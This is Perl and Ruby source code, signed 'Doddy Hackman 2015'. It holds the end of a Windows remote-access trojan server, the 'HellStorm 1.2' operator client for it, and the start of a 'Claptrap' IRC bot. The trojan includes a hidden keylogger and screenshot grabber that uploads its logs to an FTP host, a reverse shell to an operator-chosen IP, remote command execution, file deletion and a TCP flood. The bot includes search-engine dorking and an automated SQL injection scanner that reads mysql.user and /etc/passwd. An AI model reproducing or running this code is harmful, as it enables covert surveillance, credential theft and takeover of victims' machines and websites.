my %vida = adminprocess("listar");
print $soquete "PRIVMSG $canal_irc : [+] Process Found : "
. int( keys %vida ) . "\r\n";
for my $data ( keys %vida ) {
print $soquete "PRIVMSG $canal_irc : [+] Process : "
. $data
. " [+] PID : "
. $vida{$data} . "\r\n";
}
}
if ( $logar =~ /:$nick_irc cerrarproceso :(.*):(.*):/ ) {
my ( $b, $a ) = ( $1, $2 );
if ( adminprocess( "cerrar", $a, $b ) ) {
print $soquete "PRIVMSG $canal_irc : [+] Yes , master\r\n";
}
}
}
}
sub conexion_directa {
my $sock = IO::Socket::INET->new(
LocalPort => 666,
Listen => 10,
Proto => 'tcp',
Reuse => 1
);
while ( my $con = $sock->accept ) {
$resultado = <$con>;
if ( $resultado =~ /msgbox (.*)/ig ) {
my $msg = $1;
cheats( "mensaje", $msg );
}
if ( $resultado =~ /infor/ig ) {
print $con getinfo();
}
if ( $resultado =~ /word :(.*):/ig ) {
my $msg = $1;
cheats( "word", $msg );
}
if ( $resultado =~ /crazymouse/ig ) {
cheats("crazymouse");
}
if ( $resultado =~ /cambiarfondo (.*)/ig ) {
my $url = $1;
cheats( "cambiarfondo", $url );
}
if ( $resultado =~ /opencd/ig ) {
cheats( "cd", "1" );
}
if ( $resultado =~ /closedcd/ig ) {
cheats( "cd", "0" );
}
if ( $resultado =~ /dosattack :(.*):(.*):(.*):/ ) {
my ( $i, $p, $t ) = ( $1, $2, $3 );
dosattack( $i, $p, $t );
}
if ( $resultado =~ /speak :(.*):/ig ) {
my $t = $1;
cheats( "speak", $t );
}
if ( $resultado =~ /iniciochau/ ) {
cheats( "inicio", "1" );
}
if ( $resultado =~ /iniciovuelve/ ) {
cheats( "inicio", "0" );
}
if ( $resultado =~ /iconochau/ ) {
cheats( "iconos", "1" );
}
if ( $resultado =~ /iconovuelve/ ) {
cheats( "iconos", "0" );
}
if ( $resultado =~ /backshell :(.*):(.*):/ig ) {
backshell( $1, $2 );
}
if ( $resultado =~ /comando :(.*):/ig ) {
my $cmd = $1;
my @re = cmd($cmd);
print $con @re;
}
if ( $resultado =~ /mostrarpro/ ) {
my %vida = adminprocess("listar");
for my $data ( keys %vida ) {
print $con "PROXEC" . $data . "PROXEC\r\n";
print $con "PIDX" . $vida{$data} . "PIDX\r\n";
}
}
if ( $resultado =~ /chauproce K0BRA(.*)K0BRA(.*)K0BRA/ ) {
my ( $b, $a ) = ( $1, $2 );
if ( adminprocess( "cerrar", $a, $b ) ) {
print $con "ok";
}
}
if ( $resultado =~ /chdirnow K0BRA(.*)K0BRA/ ) {
my $di = $1;
if ( navegador( "cd", $di ) ) {
print $con "ok";
}
}
if ( $resultado =~ /borrarfile K0BRA(.*)K0BRA/ ) {
if ( navegador( "borrar", $1 ) ) {
print $con "ok";
}
}
if ( $resultado =~ /borrardir K0BRA(.*)K0BRA/ ) {
if ( navegador( "borrar", $1 ) ) {
print $con "ok";
}
}
if ( $resultado =~ /rename :(.*):(.*):/ ) {
my ( $a, $b ) = ( $1, $2 );
if ( navegador( "rename", $a, $b ) ) {
print $con "ok";
}
}
if ( $resultado =~ /getcwd/ ) {
print $con getcwd();
}
if ( $resultado =~ /verlogs/ ) {
print $con openfile("logs.txt");
}
if ( $resultado =~ /dirnow ACATOY(.*)ACATOY/ ) {
my @files = navegador("listar");
for (@files) {
if ( -f $_ ) {
print $con "FILEX" . $_ . "FILEX" . "\r\n";
}
else {
print $con "DIREX" . $_ . "DIREX" . "\r\n";
}
}
}
}
}
sub keylogger {
my $come = new Win32::API( "user32", "GetAsyncKeyState", "N", "I" );
my $tengo = 0;
hideit( $0, "hide" );
my $comando1 = threads->new( \&capture_windows );
my $comando2 = threads->new( \&capture_keys );
my $comando3 = threads->new( \&capture_screen );
$comando1->join();
$comando2->join();
$comando3->join();
sub capture_windows {
while (1) {
my $win1 = GetForegroundWindow();
my $win2 = GetForegroundWindow();
if ( $win1 != $win2 ) {
my $nombre = GetWindowText($win1);
chomp($nombre);
if ( $nombre ne "" ) {
savefile( "logs.txt", "\n\n[" . $nombre . "]\n\n" );
}
}
}
return 1;
}
sub capture_keys {
while (1) {
my $test1;
my $test2;
for my $num ( 0x30 .. 0x39 ) {
if ( dame($num) ) {
savefile( "logs.txt", chr($num) );
}
}
if ( dame(0x14) ) {
$test1 = 1;
$tengo++;
}
for my $num ( 0x41 .. 0x5A ) {
if ( dame($num) ) {
if ( dame(0x20) ) {
savefile( "logs.txt", " " );
}
if ( dame(0x32) ) {
savefile( "logs.txt", "\n[enter]\n\n" );
}
unless ( verpar($tengo) eq 1 ) {
savefile( "logs.txt", chr($num) );
}
if ( dame(0x10) or dame(0xA0) or dame(0xA1) ) {
$test2 = 1;
}
unless ( $test1 eq 1 or $test2 eq 1 ) {
if ( $num >= 0x41 ) {
if ( $num <= 0x5A ) {
if ( verpar($tengo) eq 1 ) {
savefile( "logs.txt", chr( $num + 32 ) );
}
}
}
}
}
}
}
return 1;
}
sub capture_screen {
$numero = 0;
while (1) {
sleep 120;
subirftp( "logs.txt", "logs.txt" );
$numero++;
SendKeys("%{PRTSCR}");
my $a = Win32::Clipboard::GetBitmap();
open( FOTO, ">" . $numero . ".bmp" );
binmode(FOTO);
print FOTO $a;
close FOTO;
hideit( $numero . ".bmp", "hide" );
subirftp( $numero . ".bmp", $numero . ".bmp" );
}
}
sub dame {
return ( $come->Call(@_) & 1 );
}
sub savefile {
open( SAVE, ">>" . $_[0] );
print SAVE $_[1];
close SAVE;
hideit( $_[0], "hide" );
}
sub hideit {
if ( $_[1] eq "show" ) {
Win32::File::SetAttributes( $_[0], NORMAL );
}
elsif ( $_[1] eq "hide" ) {
Win32::File::SetAttributes( $_[0], HIDDEN );
}
else {
print "error\n";
}
}
sub subirftp {
if ( $ser = Net::FTP->new($host_ftp) ) {
if ( $ser->login( $user_ftp, $pass_ftp ) ) {
$ser->mkdir( getmyip() );
$ser->binary();
if (
$ser->put(
getcwd() . "/" . $_[0], getmyip() . "/" . $_[1]
)
)
{
return true;
}
}
$ser->close;
}
}
sub verpar {
return ( $_[0] % 2 == 0 ) ? "1" : "2";
}
sub getmyip {
my $get = gethostbyname("");
return inet_ntoa($get);
}
}
sub getinfo {
return
":"
. Win32::DomainName() . ":"
. Win32::GetChipName() . ":"
. Win32::GetOSVersion() . ":"
. Win32::LoginName() . ":"
. Win32::GetOSName() . ":";
}
sub cheats {
my $as = new Win32::API( 'user32', 'FindWindow', 'PP', 'N' );
my $b = new Win32::API( 'user32', 'ShowWindow', 'NN', 'N' );
if ( $_[0] eq "cambiarfondo" ) {
my $file = $_[1];
my $as =
new Win32::API( "user32", "SystemParametersInfo", [ L, L, P, L ], L );
$as->Call( 20, 0, $file, 0 );
}
if ( $_[0] eq "speak" ) {
my $texta = $_[1];
my $hablax = Win32::OLE->new("SAPI.SpVoice");
$hablax->Speak( $texta, 0 );
}
if ( $_[0] eq "crazymouse" ) {
for my $number ( 1 .. 666 ) {
MouseMoveAbsPix( $number, $number );
}
}
if ( $_[0] eq "word" ) {
my $text = $_[1];
system("start winword.exe");
sleep 4;
SendKeys($text);
}
if ( $_[0] eq "cd" ) {
my $ventana = Win32::API->new( "winmm", "mciSendString", "PPNN", "N" );
my $rta = ' ' x 127;
if ( $_[1] eq "1" ) {
$ventana->Call( 'set CDAudio door open', $rta, 127, 0 );
}
else {
$ventana->Call( 'set CDAudio door closed', $rta, 127, 0 );
}
}
if ( $_[0] eq "inicio" ) {
if ( $_[1] eq "1" ) {
$handlex = $as->Call( "Shell_TrayWnd", 0 );
$b->Call( $handlex, 0 );
}
else {
$handlex = $as->Call( "Shell_TrayWnd", 0 );
$b->Call( $handlex, 1 );
}
}
if ( $_[0] eq "iconos" ) {
if ( $_[1] eq "1" ) {
$handle = $as->Call( 0, "Program Manager" );
$b->Call( $handle, 0 );
}
else {
$handle = $as->Call( 0, "Program Manager" );
$b->Call( $handle, 1 );
}
}
if ( $_[0] eq "mensaje" ) {
if ( $_[1] ne "" ) {
my $msg = $_[1];
chomp $msg;
Win32::MsgBox( $msg, 0, "Mensaje de Dios" );
}
}
}
sub backshell {
my ( $ip, $port ) = ( $_[0], $_[1] );
$ip =~ s/(\s)+$//;
$port =~ s/(\s)+$//;
conectar( $ip, $port );
tipo();
sub conectar {
socket( REVERSE, PF_INET, SOCK_STREAM, getprotobyname('tcp') );
connect( REVERSE, sockaddr_in( $_[1], inet_aton( $_[0] ) ) );
open( STDIN, ">&REVERSE" );
open( STDOUT, ">&REVERSE" );
open( STDERR, ">&REVERSE" );
}
sub tipo {
print "\n[*] Reverse Shell Starting...\n\n";
if ( $^O =~ /Win32/ig ) {
infowin();
system("cmd.exe");
}
else {
infolinux();
system("export TERM=xterm;exec sh -i");
}
}
sub infowin {
print "[+] Domain Name : " . Win32::DomainName() . "\n";
print "[+] OS Version : " . Win32::GetOSName() . "\n";
print "[+] Username : " . Win32::LoginName() . "\n\n\n";
}
sub infolinux {
print "[+] System information\n\n";
system("uname -a");
print "\n\n";
}
}
sub cmd {
my $job = Win32::Job->new;
$job->spawn(
"cmd",
qq{cmd /C $_[0]},
{
no_window => "true",
stdout => "logx.txt",
stderr => "logx.txt"
}
);
$ok = $job->run("30");
open( F, "logx.txt" );
@words = <F>;
close F;
unlink("logx.txt");
return @words;
}
sub adminprocess {
if ( $_[0] eq "listar" ) {
my %procesos;
my $uno = Win32::OLE->new("WbemScripting.SWbemLocator");
my $dos = $uno->ConnectServer( "", "root\\cimv2" );
foreach my $pro ( in $dos->InstancesOf("Win32_Process") ) {
$procesos{ $pro->{Caption} } = $pro->{ProcessId};
}
return %procesos;
}
if ( $_[0] eq "cerrar" ) {
my ( $numb, $pid ) = ( $_[1], $_[2] );
if ( Win32::Process::KillProcess( $pid, $numb ) ) {
return true;
}
else {
return false;
}
}
}
sub navegador {
my $dir = $_[1];
chomp $dir;
$dir =~ s/(\s)+$//;
if ( $_[0] eq "borrar" ) {
if ( -f $_[1] ) {
if ( unlink( getcwd() . "/" . $_[1] ) ) {
return true;
}
else {
return false;
}
}
else {
if ( rmdir( getcwd() . "/" . $_[1] ) ) {
return true;
}
else {
return false;
}
}
}
if ( $_[0] eq "cd" ) {
if ( chdir $dir ) {
return true;
}
else {
return false;
}
}
if ( $_[0] eq "rename" ) {
if ( rename( getcwd() . "/" . $_[1], getcwd() . "/" . $_[2] ) ) {
return true;
}
else {
return false;
}
}
if ( $_[0] eq "listar" ) {
my @archivos = coleccionar( getcwd() );
my @all;
for my $test (@archivos) {
push( @all, $test );
}
return @all;
}
sub coleccionar {
opendir DIR, $_[0];
my @archivos = readdir DIR;
close DIR;
return @archivos;
}
}
sub dosattack {
for ( 1 .. $_[2] ) {
IO::Socket::INET->new(
PeerAddr => $_[0],
PeerPort => $_[1],
Proto => "tcp"
);
}
}
sub openfile {
my $r;
open( FILE, $_[0] );
@wor = <FILE>;
close FILE;
for (@wor) {
$r .= $_;
}
return $r;
}
sub openfilex {
my @wor;
open( FILE, $_[0] );
@wor = <FILE>;
close FILE;
return @wor;
}
sub encriptar {
my ( $text, $op ) = @_;
my @re;
my @va = split( "", $text );
my %valor = (
"1" => "a",
"2" => "b",
"3" => "c",
"4" => "d",
"5" => "e",
"6" => "f",
"7" => "g",
"8" => "h",
"9" => "i",
"0" => "j",
"." => "k"
);
if ( $op eq "encode" ) {
for my $letra (@va) {
for my $data ( keys %valor ) {
if ( $data eq $letra ) {
$letra =~ s/$data/$valor{$data}/g;
push( @re, $letra );
}
}
}
}
if ( $op eq "decode" ) {
for my $letra (@va) {
for my $data ( keys %valor ) {
if ( $valor{$data} eq $letra ) {
$letra =~ s/$valor{$data}/$data/g;
push( @re, $letra );
}
}
}
}
return @re;
}
sub dameip {
my @wor = encriptar( getmyip(), "encode" );
for (@wor) {
$resultado .= $_;
}
return $resultado;
}
# The End ?
#!usr/bin/perl
#Project HellStorm 1.2
#(C) Doddy Hackman 2015
use IO::Socket;
use Cwd;
&menu;
# Functions
sub clean {
my $os = $^O;
if ( $os =~ /Win32/ig ) {
system("cls");
}
else {
system("clear");
}
}
sub head {
clean();
print "\n\n-- == HellStorm 1.2 (C) Doddy Hackman 2015 == --\n\n\n";
}
sub menu {
&head;
print "[+] Target : ";
chomp( my $ip = <STDIN> );
my $socket = new IO::Socket::INET(
PeerAddr => $ip,
PeerPort => 666,
Proto => 'tcp',
Timeout => 5
);
if ($socket) {
$socket->close;
&menuo($ip);
}
else {
print "\n\n[-] Server not infected\n";
<STDIN>;
&menu;
}
}
sub menuo {
&head;
print "[$_[0]] : Online\n\n";
print q(
1 : Information
2 : Files Manager
3 : Open CD
4 : Close CD
5 : Talk
6 : Message
7 : Console
8 : Hide taskbar
9 : Show taskbar
10 : Hide Icons
11 : Show Icons
12 : Process Manager
13 : Reverse Shell
14 : DOS Attack
15 : Change Wallpaper
16 : Word Writer
17 : Move Mouse
18 : See logs keylogger
19 : Change target
20 : Exit
);
print "[Option] : ";
chomp( my $opcion = <STDIN> );
if ( $opcion eq 1 ) {
print "\n\n[+] Information\n\n";
$re = daryrecibir( $_[0], "infor" );
if ( $re =~ /:(.*):(.*):(.*):(.*):(.*):/ ) {
print "[+] Domain : $1\n";
print "[+] Chip : $2\n";
print "[+] Version : $3\n";
print "[+] Username : $4\n";
print "[+] OS : $5\n";
print "\n[+] Press any key to continue\n";
<stdin>;
}
&menuo( $_[0] );
}
elsif ( $opcion eq 2 ) {
menu1:
print "\n\n[+] Files Manager\n\n";
$cwd = daryrecibir( $_[0], "getcwd" . "\r\n" );
show( $_[0], "/" );
&menu2;
sub menu2 {
print "\n\n[Options]\n\n";
print "1 - Change directory\n";
print "2 - Rename\n";
print "3 - Delete File\n";
print "4 - Delete Directory\n";
print "5 - Return to menu\n\n";
print "[Opcion] : ";
chomp( my $op = <stdin> );
if ( $op eq 1 ) {
print "\n\n[+] Directory : ";
chomp( my $dir = <stdin> );
$ver = daryrecibir( $_[0], "chdirnow K0BRA" . $dir . "K0BRA" );
if ( $ver =~ /ok/ig ) {
print "\n\n[+] Directory changed\n\n";
}
else {
print "\n\n[-] Error\n\n";
<stdin>;
}
show( $_[0], $dir );
&menu2;
print "\n[+] Press any key to continue\n";
<stdin>;
}
elsif ( $op eq 2 ) {
print "\n\n[+] Name : ";
chomp( my $old = <stdin> );
print "\n\n[+] New name : ";
chomp( my $new = <stdin> );
$re = daryrecibir( $_[0], "rename :$old:$new:" );
if ( $re =~ /ok/ ) {
print "\n\n[+] File renamed\n\n";
}
else {
print "\n\n[-] Error\n\n";
}
print "\n[+] Press any key to continue\n";
<stdin>;
}
elsif ( $op eq 3 ) {
print "\n\n[+] File to delete : ";
chomp( my $file = <stdin> );
$re =
daryrecibir( $_[0], "borrarfile K0BRA" . $file . "K0BRA" );
if ( $re =~ /ok/ ) {
print "\n\n[+] File deleted\n\n";
}
else {
print "\n\n[-] Error\n\n";
}
print "\n[+] Press any key to continue\n";
<stdin>;
}
elsif ( $op eq 4 ) {
print "\n\n[+] Directory to delete : ";
chomp( my $file = <stdin> );
$re = daryrecibir( $_[0], "borrardir K0BRA" . $file . "K0BRA" );
if ( $re =~ /ok/ ) {
print "\n\n[+] Directory deleted\n\n";
}
else {
print "\n\n[-] Error\n\n";
}
print "\n[+] Press any key to continue\n";
<stdin>;
}
elsif ( $op eq 5 ) {
&menuo( $_[0] );
}
else {
show( $_[0], "/" );
}
goto menu1;
}
}
elsif ( $opcion eq 3 ) {
daryrecibir( $_[0], "opencd" );
print "\n[+] Press any key to continue\n";
<stdin>;
&menuo( $_[0] );
}
elsif ( $opcion eq 4 ) {
daryrecibir( $_[0], "closedcd" );
print "\n[+] Press any key to continue\n";
<stdin>;
&menuo( $_[0] );
}
elsif ( $opcion eq 5 ) {
print "\n\n[+] Talk : ";
chomp( my $talk = <stdin> );
$re = daryrecibir( $_[0], "speak :$talk:" );
print "\n[+] Press any key to continue\n";
<stdin>;
&menuo( $_[0] );
}
elsif ( $opcion eq 6 ) {
print "\n[+] Message : ";
chomp( my $msg = <stdin> );
daryrecibir( $_[0], "msgbox $msg" );
print "\n[+] Press any key to continue\n";
<stdin>;
&menuo( $_[0] );
}
elsif ( $opcion eq 7 ) {
menu:
my $cmd, $re;
print "\n\n>";
chomp( my $cmd = <stdin> );
if ( $cmd =~ /exit/ig ) {
print "\n[+] Press any key to continue\n";
<stdin>;
&menuo( $_[0] );
}
$re = daryrecibir( $_[0], "comando :$cmd:" );
print "\n" . $re;
goto menu;
&menuo( $_[0] );
}
elsif ( $opcion eq 8 ) {
daryrecibir( $_[0], "iniciochau" );
print "\n[+] Press any key to continue\n";
<stdin>;
&menuo( $_[0] );
}
elsif ( $opcion eq 9 ) {
daryrecibir( $_[0], "iniciovuelve" );
print "\n[+] Press any key to continue\n";
<stdin>;
&menuo( $_[0] );
}
elsif ( $opcion eq 10 ) {
daryrecibir( $_[0], "iconochau" );
print "\n[+] Press any key to continue\n";
<stdin>;
&menuo( $_[0] );
}
elsif ( $opcion eq 11 ) {
daryrecibir( $_[0], "iconovuelve" );
print "\n[+] Press any key to continue\n";
<stdin>;
&menuo( $_[0] );
}
elsif ( $opcion eq 12 ) {
&reload( $_[0] );
sub reload {
my @pro;
my @pids;
my $sockex = new IO::Socket::INET(
PeerAddr => $_[0],
PeerPort => 666,
Proto => 'tcp',
Timeout => 5
);
print $sockex "mostrarpro" . "\r\n";
$sockex->read( $re, 5000 );
$sockex->close;
chomp $re;
print "\n\n[+] Process Found\n\n";
while ( $re =~ /PROXEC(.*?)PROXEC/ig ) {
if ( $1 ne "" ) {
push( @pro, $1 );
}
}
while ( $re =~ /PIDX(.*?)PIDX/ig ) {
if ( $1 ne "" ) {
push( @pids, $1 );
}
}
$cantidad = int(@pro);
for my $num ( 1 .. $cantidad ) {
if ( $pro[$num] ne "" ) {
print "\n[+] Process : " . $pro[$num] . "\n";
print "[+] PID : " . $pids[$num] . "\n";
}
}
print q(
[Options]
1 - Refresh list
2 - Close process
3 - Return to menu
);
print "\n[Option] : ";
chomp( my $opc = <stdin> );
if ( $opc =~ /1/ig ) {
&reload( $_[0] );
}
elsif ( $opc =~ /2/ig ) {
print "\n[+] Write the name of the process : ";
chomp( my $numb = <stdin> );
print "\n[+] Write the PID of the process : ";
chomp( my $pid = <stdin> );
$re = daryrecibir( $_[0],
"chauproce K0BRA" . $pid . "K0BRA" . $numb . "K0BRA" );
if ( $re =~ /ok/ig ) {
print "\n\n[+] Proceso killed\n\n";
}
else {
print "\n\n[-] Error\n\n";
}
print "\n[+] Press any key to continue\n";
<stdin>;
&reload( $_[0] );
}
elsif ( $opc =~ /3/ig ) {
print "\n[+] Press any key to continue\n";
<stdin>;
&menuo( $_[0] );
}
else {
&reload;
}
}
}
elsif ( $opcion eq 13 ) {
print "\n\n[+] IP : ";
chomp( my $ip = <stdin> );
print "\n\n[+] Port : ";
chomp( my $port = <stdin> );
print "\n\n[+] Connected !!!\n\n";
$re = daryrecibir( $_[0], "backshell :$ip:$port:" );
}
elsif ( $opcion eq 14 ) {
print "\n\n[+] IP : ";
chomp( my $ipx = <stdin> );
print "\n\n[+] Port : ";
chomp( my $por = <stdin> );
print "\n\n[+] Count : ";
chomp( my $count = <stdin> );
print "\n\n[+] Command Send !!!!\n\n";
daryrecibir( $_[0], "dosattack :$ipx:$por:$count:" );
print "\n[+] Press any key to continue\n";
<stdin>;
&menuo( $_[0] );
}
elsif ( $opcion eq 15 ) {
print "\n\n[+] Image with format BMP : ";
chomp( my $id = <stdin> );
daryrecibir( $_[0], "cambiarfondo $id" );
print "\n[+] Press any key to continue\n";
<stdin>;
&menuo( $_[0] );
}
elsif ( $opcion eq 16 ) {
print "\n\n[+] Text : ";
chomp( my $tx = <stdin> );
daryrecibir( $_[0], "word :$tx:" );
print "\n[+] Press any key to continue\n";
<stdin>;
&menuo( $_[0] );
}
elsif ( $opcion eq 17 ) {
daryrecibir( $_[0], "crazymouse" );
print "\n[+] Press any key to continue\n";
<stdin>;
&menuo( $_[0] );
}
elsif ( $opcion eq 18 ) {
print "\n\n[Logs]\n\n";
$re = daryrecibir( $_[0], "verlogs" );
print $re. "\n\n";
print "\n[+] Press any key to continue\n";
<stdin>;
&menuo( $_[0] );
}
elsif ( $opcion eq 19 ) {
&menu;
}
elsif ( $opcion eq 20 ) {
print "\n[+] Press any key to continue\n";
<stdin>;
exit 1;
}
else {
&menuo;
}
}
sub daryrecibir {
my $sockex = new IO::Socket::INET(
PeerAddr => $_[0],
PeerPort => 666,
Proto => 'tcp',
Timeout => 5
);
print $sockex $_[1] . "\r\n";
$sockex->read( $re, 5000 );
$sockex->close;
return $re . "\r";
}
sub show {
my $re = daryrecibir( $_[0], "getcwd" . "\r\n" );
print "\n\n[+] Directory : $re\n\n";
$re1 = daryrecibir( $_[0], "dirnow ACATOY" . $re . "ACATOY" . "\r\n" );
print "\n\n[Directories found]\n\n";
while ( $re1 =~ /DIREX(.*?)DIREX/ig ) {
if ( $1 ne "" ) {
print "[+] $1\n";
}
}
print "\n\n[Files found]\n\n";
while ( $re1 =~ /FILEX(.*?)FILEX/ig ) {
if ( $1 ne "" ) {
print "[+] $1\n";
}
}
}
#The End ?
#!usr/bin/ruby
#Claptrap IRC Bot 0.5
#(C) Doddy Hackman 2015
require "socket"
require "open-uri"
require "net/http"
require "resolv"
require "base64"
require "digest/md5"
$timeout = "1"
# Functions
def head()
print "\n\n
@@@@ @ @ @@@@@ @@@@@ @@@@@ @ @@@@@ @ @@@@@ @@@@
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @ @ @@@@@ @ @@@@@ @ @ @@@@@ @ @@@@@ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@ @ @@@@@ @ @ @ @ @@@@@ @ @ @ @ @
@ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @ @
@@@@ @@@@@@ @ @ @ @ @ @ @ @ @ @ @ @@@@
\n\n"
end
def copyright()
print "\n\n-- == (C) Doddy Hackman 2015 == --\n\n"
end
#
# Functions ClapTrap
def get_ip(hostname)
begin
return Resolv.getaddress(hostname)
rescue
return "Error"
end
end
def toma(web)
begin
return open(web, "User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0").read
rescue
return "Error"
end
end
def response_code(web)
begin
return Net::HTTP.get_response(URI(web)) .code
rescue
return "404"
end
end
def tomar(web,arg)
begin
headers = {"User-Agent" => "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/25.0"}
uri = URI(web)
http = Net::HTTP.new(uri.host, uri.port)
return http.post(uri.path,arg, headers).body
rescue
return "Error"
end
end
def toma_ssl(web)
uri = URI.parse(web)
nave = Net::HTTP.new(uri.host, uri.port)
nave.use_ssl = true
nave.verify_mode = OpenSSL::SSL::VERIFY_NONE
return nave.get(uri.request_uri,{"User-Agent"=> "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:25.0) Gecko/20100101 Firefox/20.0"}).body
end
def cortar(pages)
final = ""
finales = []
pages.flatten.each do |page|
if page=~/(.*)=(.*)/
parte1 = $1
parte2 = $2
final = parte1 + "="
finales.push(final)
end
end
return finales
end
def google(dork,pages)
links = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma_ssl("https://www.google.com.ar/search?hl=&q=" + dork+ "&start="+contador.to_s)
paginas = code.scan(/(?<="r"><. href=")(.+?)"/)
paginas.flatten.each do |pagina|
partes = pagina
if partes=~/url\?q=(.*)&sa/
parte = $1
link = URI::decode(parte)
links.push(link)
end
end
end
links = links.uniq
return links
end
def google_recursive(dork,pages)
dork = dork.sub(/ /,"+")
contador = 0
guardo = []
for i in ("1"..pages)
contador+=10
url = "https://www.google.com.ar/search?hl=&q="+dork+"&start="+contador.to_s
code = toma_ssl(url)
links = URI::extract(code)
links.each do |link|
if link=~/cache:(.*?):(.*?)\+/
link_final = "http://"+$2
link_final = URI::decode(link_final)
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end
def bing(dork,pages)
guardo = []
dork = dork.sub(/ /,"+")
contador = 0
for i in ("1"..pages)
contador+=10
code = toma("http://www.bing.com/search?q=" + dork + "&first=" + contador.to_s)
links = code.scan(/<h2><a href="(.*?)" h/)
links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
links = code.scan(/<h3><a href="(.*?)" h/)
links.flatten.each do |link|
link_final = URI::decode(link)
if not link_final=~/http:\/\/778802\.r\.msn\.com\//
guardo.push(link_final)
end
end
end
guardo = guardo.uniq
return guardo
end
def bypass(op)
if op=="--"
return "+","--"
elsif op=="/*"
return "/**/","/**/"
elsif op=="%20"
return "%20","%00"
else
return "+","--"
end
end
def decode_hex(text)
text = text.sub("0x","")
return [text].pack('H*')
end
def encode_hex(text)
return "0x"+text.unpack('H*')[0]
end
def httpfinger(page)
respuesta = ""
begin
nave = Net::HTTP.start(page)
headers = nave.head("/")
headers.each do |name,value|
respuesta = respuesta + "[+] "+name+" : "+value+"\n"
end
nave.finish
rescue
respuesta = "Error"
end
return respuesta
end
##
def locateip(target)
resultado = ""
resultado = resultado + "\n[+] Getting IP ...\n"
ip = get_ip(target)
resultado = resultado + "\n[+] IP : "+ip+"\n"
web = "http://www.melissadata.com/lookups/iplocation.asp"
resultado = resultado + "\n[+] Locating ...\n\n"
code = tomar(web,"ipaddress="+ip+"&btn=Submit")
if code=~/City<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
resultado = resultado + "[+] City : "+$2+"\n"
else
resultado = resultado + "[+] City : Not Found\n"
end
if code=~/Country<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
resultado = resultado + "[+] Country : "+$2+"\n"
else
resultado = resultado + "[+] Country : Not Found\n"
end
if code=~/State or Region<\/td><td align=(.*)><b>(.*)<\/b><\/td>/
resultado = resultado + "[+] State or Region : "+$2+"\n";
else
resultado = resultado + "[+] State of Region : Not Found\n"
end
resultado = resultado + "\n[+] Getting DNS ...\n\n"
control = "0"
code = toma("http://www.ip-adress.com/reverse_ip/"+ip)
dnss = code.scan(/whois\/(.*?)\">Whois/)
dnss.flatten.each do |dns|
begin
if dns != ""
control = "1"
resultado = resultado + "[+] DNS Found : "+dns
end
end
end
if control=="0"
resultado = resultado + "\n[-] DNS Not Found\n"
end
return resultado
end
def details(url,by)
pass1,pass2 = bypass(by)
resultado = ""
hextest = "0x2f6574632f706173737764" #/etc/passwd
hextest = "0x633A2F78616D70702F726561642E747874" #c:/xampp/read.txt
web1 = url.sub(/hackman/,"0x4b30425241")
web2 = url.sub(/hackman/,"concat(0x4b30425241,user(),0x4b30425241,database(),0x4b30425241,version(),0x4b30425241)")
web3 = url.sub(/hackman/,"unhex(hex(concat(char(69,82,84,79,82,56,53,52),load_file("+hextest+"))))")
resultado = resultado + "\n[+] Extracting information of the DB\n"
code1 = toma(web2)
if code1=~/K0BRA(.*)K0BRA(.*)K0BRA(.*)K0BRA/
user,data,ver = $1,$2,$3
resultado = resultado + "\n[+] Username : "+user
resultado = resultado + "\n[+] Database : "+data
resultado = resultado + "\n[+] Version : "+ver+"\n\n"
else
resultado = resultado + "[-] Not Found\n"
end
code2 = toma(web1+pass1+"from"+pass1+"mysql.user"+pass2)
code3 = toma(web1+pass1+"from"+pass1+"information_schema.tables"+pass2)
code4 = toma(web3)
if code2=~/K0BRA/
resultado = resultado + "[+] Mysql User : ON\n"
end
if code3=~/K0BRA/
resultado = resultado + "[+] information_schema : ON\n"
end
if code4=~/ERTOR854/
resultado = resultado + "[+] load_file : ON\n"
end
return resultado
end
def findlength(url,by)
pass1,pass2 = bypass(by)
z = "1"
control = "0"
resultado = ""
resultado = resultado + "\n[+] Finding columns lenght ...\n\n"
x = "concat(0x4b30425241,1,0x4b30425241)"
for num in ('2'..'25')
z = z+","+num
x= x+","+"concat(0x4b30425241,"+num+",0x4b30425241)"
code = toma(url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+x)
if code=~/K0BRA(.*?)K0BRA/
resultado = resultado + "[+] The Page has "+num+" columns\n"
resultado = resultado + "[+] The number "+$1+" print data\n"
z = z.sub($1,"hackman")
sqli = url+"1"+pass1+"and"+pass1+"1=0"+pass1+"union"+pass1+"select"+pass1+z
control = "1"
break
end
end
if control != "1"
resultado = resultado + "[-] Columns lenght not found\n"
end
return resultado,sqli,control
end
def scanner_sqli(page,by)
pass1,pass2 = bypass(by)
resultado = ""
rta1 = ""
rta2 = ""
resultado = resultado + "[+] Testing vulnerability ...\n\n"
codeuno = toma(page+"1"+pass1+"and"+pass1+"1=0"+pass2)
codedos = toma(page+"1"+pass1+"and"+pass1+"1=1"+pass2)
if codeuno != codedos
resultado = resultado + "[+] Vulnerable !\n"
rta1,sqli,control = findlength(page,by)
if control=="1"
rta2 = details(sqli,"--")
end
else
resultado = resultado + "[-] Not Vulnerable\n"
end
resultado = resultado + rta1 + rta2
return resultado
end
def scanner_lfi(web)
resultado = ""
